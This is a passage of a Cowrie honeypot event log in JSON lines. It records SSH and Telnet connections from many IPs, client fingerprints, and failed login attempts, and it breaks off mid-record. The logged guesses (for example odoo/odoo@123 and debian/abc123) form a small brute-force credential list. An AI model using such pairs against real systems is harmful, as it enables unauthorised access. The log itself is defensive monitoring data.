{"eventid":"cowrie.session.connect","src_ip":"199.45.154.141","src_port":59226,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c141c3abd9","protocol":"ssh","message":"New connection: 199.45.154.141:59226 (1.2.3.4:22) [session: f3c141c3abd9]","sensor":"my-vps","timestamp":"2025-09-09T00:21:48.798168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:21:49.394167Z","src_ip":"199.45.154.141","session":"f3c141c3abd9"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-09-09T00:21:49.395013Z","src_ip":"199.45.154.141","session":"f3c141c3abd9"}
{"eventid":"cowrie.session.connect","src_ip":"207.90.244.14","src_port":34806,"dst_ip":"1.2.3.4","dst_port":23,"session":"6287724f9517","protocol":"telnet","message":"New connection: 207.90.244.14:34806 (1.2.3.4:23) [session: 6287724f9517]","sensor":"my-vps","timestamp":"2025-09-09T00:22:02.351830Z"}
{"eventid":"cowrie.session.connect","src_ip":"207.90.244.14","src_port":34812,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa962a1eef46","protocol":"telnet","message":"New connection: 207.90.244.14:34812 (1.2.3.4:23) [session: fa962a1eef46]","sensor":"my-vps","timestamp":"2025-09-09T00:22:03.654711Z"}
{"eventid":"cowrie.session.closed","duration":1.3749964237213135,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:03.726731Z","src_ip":"207.90.244.14","session":"6287724f9517"}
{"eventid":"cowrie.session.closed","duration":0.17842960357666016,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:03.833033Z","src_ip":"207.90.244.14","session":"fa962a1eef46"}
{"eventid":"cowrie.session.connect","src_ip":"207.90.244.14","src_port":34816,"dst_ip":"1.2.3.4","dst_port":23,"session":"a551ac929412","protocol":"telnet","message":"New connection: 207.90.244.14:34816 (1.2.3.4:23) [session: a551ac929412]","sensor":"my-vps","timestamp":"2025-09-09T00:22:03.969578Z"}
{"eventid":"cowrie.session.closed","duration":0.05048251152038574,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:04.019984Z","src_ip":"207.90.244.14","session":"a551ac929412"}
{"eventid":"cowrie.session.closed","duration":"15.7","message":"Connection lost after 15.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:04.535151Z","src_ip":"199.45.154.141","session":"f3c141c3abd9"}
{"eventid":"cowrie.session.connect","src_ip":"207.90.244.14","src_port":34832,"dst_ip":"1.2.3.4","dst_port":23,"session":"054e048be3f2","protocol":"telnet","message":"New connection: 207.90.244.14:34832 (1.2.3.4:23) [session: 054e048be3f2]","sensor":"my-vps","timestamp":"2025-09-09T00:22:04.536871Z"}
{"eventid":"cowrie.session.closed","duration":0.0009953975677490234,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:04.537803Z","src_ip":"207.90.244.14","session":"054e048be3f2"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":43594,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1cc2636274b","protocol":"ssh","message":"New connection: 51.250.72.176:43594 (1.2.3.4:22) [session: a1cc2636274b]","sensor":"my-vps","timestamp":"2025-09-09T00:22:11.642413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:22:11.644037Z","src_ip":"51.250.72.176","session":"a1cc2636274b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:22:11.683196Z","src_ip":"51.250.72.176","session":"a1cc2636274b"}
{"eventid":"cowrie.login.failed","username":"superman","password":"1234567","message":"login attempt [superman/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T00:22:11.883187Z","src_ip":"51.250.72.176","session":"a1cc2636274b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:12.925475Z","src_ip":"51.250.72.176","session":"a1cc2636274b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50692,"dst_ip":"1.2.3.4","dst_port":23,"session":"e9e043d05ca3","protocol":"telnet","message":"New connection: 212.227.235.229:50692 (1.2.3.4:23) [session: e9e043d05ca3]","sensor":"my-vps","timestamp":"2025-09-09T00:22:17.140353Z"}
{"eventid":"cowrie.session.closed","duration":1.7939510345458984,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:18.934240Z","src_ip":"212.227.235.229","session":"e9e043d05ca3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44508,"dst_ip":"1.2.3.4","dst_port":23,"session":"9aa33eb189c9","protocol":"telnet","message":"New connection: 212.227.235.229:44508 (1.2.3.4:23) [session: 9aa33eb189c9]","sensor":"my-vps","timestamp":"2025-09-09T00:22:24.012962Z"}
{"eventid":"cowrie.session.closed","duration":31.254221200942993,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:22:55.267116Z","src_ip":"212.227.235.229","session":"9aa33eb189c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58059,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d4eb88ecf40","protocol":"telnet","message":"New connection: 212.227.235.229:58059 (1.2.3.4:23) [session: 4d4eb88ecf40]","sensor":"my-vps","timestamp":"2025-09-09T00:22:59.173178Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":59774,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e697b114c01","protocol":"ssh","message":"New connection: 43.156.132.147:59774 (1.2.3.4:22) [session: 5e697b114c01]","sensor":"my-vps","timestamp":"2025-09-09T00:23:05.771653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:23:05.772747Z","src_ip":"43.156.132.147","session":"5e697b114c01"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:23:06.016298Z","src_ip":"43.156.132.147","session":"5e697b114c01"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo@123","message":"login attempt [odoo/odoo@123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:23:06.991319Z","src_ip":"43.156.132.147","session":"5e697b114c01"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:23:08.238258Z","src_ip":"43.156.132.147","session":"5e697b114c01"}
{"eventid":"cowrie.session.closed","duration":31.352404594421387,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:23:30.525501Z","src_ip":"212.227.235.229","session":"4d4eb88ecf40"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":42458,"dst_ip":"1.2.3.4","dst_port":22,"session":"a814dcab0159","protocol":"ssh","message":"New connection: 103.100.209.195:42458 (1.2.3.4:22) [session: a814dcab0159]","sensor":"my-vps","timestamp":"2025-09-09T00:24:42.840980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:24:42.843764Z","src_ip":"103.100.209.195","session":"a814dcab0159"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:24:43.050518Z","src_ip":"103.100.209.195","session":"a814dcab0159"}
{"eventid":"cowrie.login.failed","username":"data","password":"qwerty","message":"login attempt [data/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:24:43.884164Z","src_ip":"103.100.209.195","session":"a814dcab0159"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:24:45.099252Z","src_ip":"103.100.209.195","session":"a814dcab0159"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":51378,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cdbca7ba66b","protocol":"ssh","message":"New connection: 152.32.129.236:51378 (1.2.3.4:22) [session: 1cdbca7ba66b]","sensor":"my-vps","timestamp":"2025-09-09T00:25:00.211885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:25:00.213431Z","src_ip":"152.32.129.236","session":"1cdbca7ba66b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:25:00.416356Z","src_ip":"152.32.129.236","session":"1cdbca7ba66b"}
{"eventid":"cowrie.login.failed","username":"debian","password":"abc123","message":"login attempt [debian/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:25:01.267010Z","src_ip":"152.32.129.236","session":"1cdbca7ba66b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:25:02.471692Z","src_ip":"152.32.129.236","session":"1cdbca7ba66b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40551,"dst_ip":"1.2.3.4","dst_port":23,"session":"4518cc5a3292","protocol":"telnet","message":"New connection: 212.227.125.160:40551 (1.2.3.4:23) [session: 4518cc5a3292]","sensor":"my-vps","timestamp":"2025-09-09T00:25:12.828386Z"}
{"eventid":"cowrie.session.closed","duration":31.09402060508728,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:25:43.922307Z","src_ip":"212.227.125.160","session":"4518cc5a3292"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60434,"dst_ip":"1.2.3.4","dst_port":22,"session":"0feb096c5180","protocol":"ssh","message":"New connection: 217.72.205.35:60434 (1.2.3.4:22) [session: 0feb096c5180]","sensor":"my-vps","timestamp":"2025-09-09T00:25:47.565311Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:25:47.566986Z","src_ip":"217.72.205.35","session":"0feb096c5180"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":45024,"dst_ip":"1.2.3.4","dst_port":22,"session":"9858097f24d7","protocol":"ssh","message":"New connection: 51.250.72.176:45024 (1.2.3.4:22) [session: 9858097f24d7]","sensor":"my-vps","timestamp":"2025-09-09T00:26:03.737632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:26:03.738774Z","src_ip":"51.250.72.176","session":"9858097f24d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:26:03.778105Z","src_ip":"51.250.72.176","session":"9858097f24d7"}
{"eventid":"cowrie.login.failed","username":"amit","password":"password","message":"login attempt [amit/password] failed","sensor":"my-vps","timestamp":"2025-09-09T00:26:03.976300Z","src_ip":"51.250.72.176","session":"9858097f24d7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:26:05.017902Z","src_ip":"51.250.72.176","session":"9858097f24d7"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":34854,"dst_ip":"1.2.3.4","dst_port":22,"session":"b368a6ad6a83","protocol":"ssh","message":"New connection: 43.156.132.147:34854 (1.2.3.4:22) [session: b368a6ad6a83]","sensor":"my-vps","timestamp":"2025-09-09T00:26:08.966214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:26:08.968202Z","src_ip":"43.156.132.147","session":"b368a6ad6a83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:26:09.212520Z","src_ip":"43.156.132.147","session":"b368a6ad6a83"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":33018,"dst_ip":"1.2.3.4","dst_port":22,"session":"1659744a7a03","protocol":"ssh","message":"New connection: 5.202.105.236:33018 (1.2.3.4:22) [session: 1659744a7a03]","sensor":"my-vps","timestamp":"2025-09-09T00:26:09.846308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:26:09.847005Z","src_ip":"5.202.105.236","session":"1659744a7a03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:26:09.985292Z","src_ip":"5.202.105.236","session":"1659744a7a03"}
{"eventid":"cowrie.login.failed","username":"amit","password":"password","message":"login attempt [amit/password] failed","sensor":"my-vps","timestamp":"2025-09-09T00:26:10.231917Z","src_ip":"43.156.132.147","session":"b368a6ad6a83"}
{"eventid":"cowrie.login.failed","username":"factory","password":"!","message":"login attempt [factory/!] failed","sensor":"my-vps","timestamp":"2025-09-09T00:26:10.576121Z","src_ip":"5.202.105.236","session":"1659744a7a03"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:26:11.478455Z","src_ip":"43.156.132.147","session":"b368a6ad6a83"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:26:11.705848Z","src_ip":"5.202.105.236","session":"1659744a7a03"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":33239,"dst_ip":"1.2.3.4","dst_port":22,"session":"04be0e44a14f","protocol":"ssh","message":"New connection: 103.100.209.195:33239 (1.2.3.4:22) [session: 04be0e44a14f]","sensor":"my-vps","timestamp":"2025-09-09T00:27:03.483094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:27:03.484164Z","src_ip":"103.100.209.195","session":"04be0e44a14f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-5